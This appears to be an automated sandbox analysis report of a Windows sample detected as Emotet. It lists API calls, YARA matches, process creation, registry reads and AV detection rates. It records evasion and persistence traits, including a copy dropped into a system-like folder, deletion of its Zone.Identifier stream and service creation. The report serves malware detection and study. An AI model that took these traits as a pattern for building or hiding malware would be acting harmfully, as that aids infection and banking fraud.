Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000007.00000003.306152917.0000019634040000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.306531931.000001963405C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000007.00000003.306126697.0000019634049000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000007.00000002.306531931.000001963405C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000007.00000002.306531931.000001963405C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000007.00000002.306497289.0000019634052000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.306126697.0000019634049000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000007.00000002.306485018.000001963403D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000007.00000003.283845753.0000019634031000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000007.00000002.306485018.000001963403D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000007.00000002.306458625.0000019634013000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.306485018.000001963403D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000007.00000003.306145388.0000019634045000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000007.00000003.306145388.0000019634045000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000007.00000003.283845753.0000019634031000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000007.00000002.306481032.000001963403A000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000007.00000002.306497289.0000019634052000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unlodctr.exe, 00000001.00000002.498130310.000000000079A000.00000004.00000020.sdmp	Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: unlodctr.exe, 00000001.00000002.498130310.000000000079A000.00000004.00000020.sdmp	Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00424554 GetKeyState,GetKeyState,GetKeyState,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0040AAE1 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00439719 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0040589A SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00423E75 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00424554 GetKeyState,GetKeyState,GetKeyState,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0040AAE1 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00439719 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0040589A SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00423E75 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_00424554 GetKeyState,GetKeyState,GetKeyState,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0040AAE1 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_00439719 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0040589A SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_00423E75 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000001.00000002.498518056.0000000002251000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.498493339.0000000002234000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.236225902.0000000002231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.236214362.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.498077947.0000000000780000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.236259963.0000000002314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.WZ1j9bqSlV.exe.2230000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.unlodctr.exe.2250000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02252730 CryptAcquireContextW,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02252730 CryptAcquireContextW,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	File created: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\			Jump to behavior
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	File created: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\			Jump to behavior

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	File deleted: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe:Zone.Identifier			Jump to behavior
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	File deleted: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe:Zone.Identifier			Jump to behavior

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043E223
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0044E361
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0040C634
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043EA03
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0044CAE5
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043EE23
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0044D1DD
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0044360B
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043DD4E
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02238180
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02237590
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02231C70
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043E223
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0044E361
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0040C634
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043EA03
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0044CAE5
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043EE23
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0044D1DD
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0044360B
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043DD4E
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02238180
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02237590
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02231C70
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0043E223
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0044E361
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0040C634
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0043EA03
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0044CAE5
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0043EE23
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0044D1DD
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0044360B
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0043DD4E
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02258180
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02257590
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02251C70
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0078912E
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0078380E
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_00789D1E

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: String function: 0043D4FB appears 236 times
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: String function: 0043D52E appears 47 times
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: String function: 0041CD0D appears 36 times
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: String function: 0043D1FC appears 60 times
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: String function: 0043D4FB appears 236 times
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: String function: 0043D52E appears 47 times
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: String function: 0041CD0D appears 36 times
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: String function: 0043D1FC appears 60 times
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: String function: 0043D4FB appears 236 times
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: String function: 0043D52E appears 47 times
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: String function: 0041CD0D appears 36 times
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: String function: 0043D1FC appears 60 times

Source: WZ1j9bqSlV.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WZ1j9bqSlV.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WZ1j9bqSlV.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WZ1j9bqSlV.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: WZ1j9bqSlV.exe, 00000000.00000002.235513271.0000000000470000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMDI_Notepad.EXEP vs WZ1j9bqSlV.exe
Source: WZ1j9bqSlV.exe, 00000000.00000002.237000650.0000000002B70000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs WZ1j9bqSlV.exe
Source: WZ1j9bqSlV.exe, 00000000.00000002.237000650.0000000002B70000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs WZ1j9bqSlV.exe
Source: WZ1j9bqSlV.exe, 00000000.00000002.236832361.0000000002A70000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs WZ1j9bqSlV.exe
Source: WZ1j9bqSlV.exe	Binary or memory string: OriginalFilenameMDI_Notepad.EXEP vs WZ1j9bqSlV.exe
Source: WZ1j9bqSlV.exe, 00000000.00000002.235513271.0000000000470000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameMDI_Notepad.EXEP vs WZ1j9bqSlV.exe
Source: WZ1j9bqSlV.exe, 00000000.00000002.237000650.0000000002B70000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs WZ1j9bqSlV.exe
Source: WZ1j9bqSlV.exe, 00000000.00000002.237000650.0000000002B70000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs WZ1j9bqSlV.exe
Source: WZ1j9bqSlV.exe, 00000000.00000002.236832361.0000000002A70000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs WZ1j9bqSlV.exe
Source: WZ1j9bqSlV.exe	Binary or memory string: OriginalFilenameMDI_Notepad.EXEP vs WZ1j9bqSlV.exe

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll

Source: classification engine

Classification label: mal76.troj.evad.winEXE@14/5@0/4

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00417BCC __EH_prolog3_GS,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00417BCC __EH_prolog3_GS,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,

Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02254CA0 Process32NextW,Process32NextW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,FindCloseChangeNotification,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02254CA0 Process32NextW,Process32NextW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,FindCloseChangeNotification,

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_004340AF __EH_prolog3_GS,GetVersionExA,CoInitializeEx,CoCreateInstance,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_004340AF __EH_prolog3_GS,GetVersionExA,CoInitializeEx,CoCreateInstance,

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00416858 FindResourceA,LoadResource,LockResource,FreeResource,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00416858 FindResourceA,LoadResource,LockResource,FreeResource,

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235060 QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235060 QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3000:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3000:120:WilError_01

Source: WZ1j9bqSlV.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: WZ1j9bqSlV.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	File read: C:\Users\desktop.ini			Jump to behavior
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	File read: C:\Users\desktop.ini			Jump to behavior

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: WZ1j9bqSlV.exe	Virustotal: Detection: 52%
Source: WZ1j9bqSlV.exe	Metadefender: Detection: 40%
Source: WZ1j9bqSlV.exe	ReversingLabs: Detection: 58%
Source: WZ1j9bqSlV.exe	Virustotal: Detection: 52%
Source: WZ1j9bqSlV.exe	Metadefender: Detection: 40%
Source: WZ1j9bqSlV.exe	ReversingLabs: Detection: 58%

Source: unknown	Process created: C:\Users\user\Desktop\WZ1j9bqSlV.exe 'C:\Users\user\Desktop\WZ1j9bqSlV.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Process created: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Users\user\Desktop\WZ1j9bqSlV.exe 'C:\Users\user\Desktop\WZ1j9bqSlV.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Process created: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: WZ1j9bqSlV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: WZ1j9bqSlV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: WZ1j9bqSlV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: WZ1j9bqSlV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: WZ1j9bqSlV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: WZ1j9bqSlV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: WZ1j9bqSlV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: WZ1j9bqSlV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: WZ1j9bqSlV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: WZ1j9bqSlV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00401D50 SetFileAttributesA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,UpdateWindow,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_00401D50 SetFileAttributesA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,VirtualAlloc,UpdateWindow,

Source: WZ1j9bqSlV.exe	Static PE information: real checksum: 0x958ba should be: 0x8ef7a
Source: WZ1j9bqSlV.exe	Static PE information: real checksum: 0x958ba should be: 0x8ef7a

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043D241 push ecx; ret
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043D5D3 push ecx; ret
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235E70 push ecx; mov dword ptr [esp], 00008D73h
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235E40 push ecx; mov dword ptr [esp], 0000AEA2h
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235EA0 push ecx; mov dword ptr [esp], 00007473h
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235F20 push ecx; mov dword ptr [esp], 0000E2ADh
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235F70 push ecx; mov dword ptr [esp], 000084ADh
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235FB0 push ecx; mov dword ptr [esp], 0000460Eh
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235D30 push ecx; mov dword ptr [esp], 00002C7Ch
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235D00 push ecx; mov dword ptr [esp], 000021B4h
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235D70 push ecx; mov dword ptr [esp], 00008067h
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235DA0 push ecx; mov dword ptr [esp], 000036B8h
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235DE0 push ecx; mov dword ptr [esp], 000025AAh
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043D241 push ecx; ret
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0043D5D3 push ecx; ret
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235E70 push ecx; mov dword ptr [esp], 00008D73h
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235E40 push ecx; mov dword ptr [esp], 0000AEA2h
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235EA0 push ecx; mov dword ptr [esp], 00007473h
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235F20 push ecx; mov dword ptr [esp], 0000E2ADh
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235F70 push ecx; mov dword ptr [esp], 000084ADh
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235FB0 push ecx; mov dword ptr [esp], 0000460Eh
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02235D30 push ecx; mov dword ptr [esp], 00002C7Ch
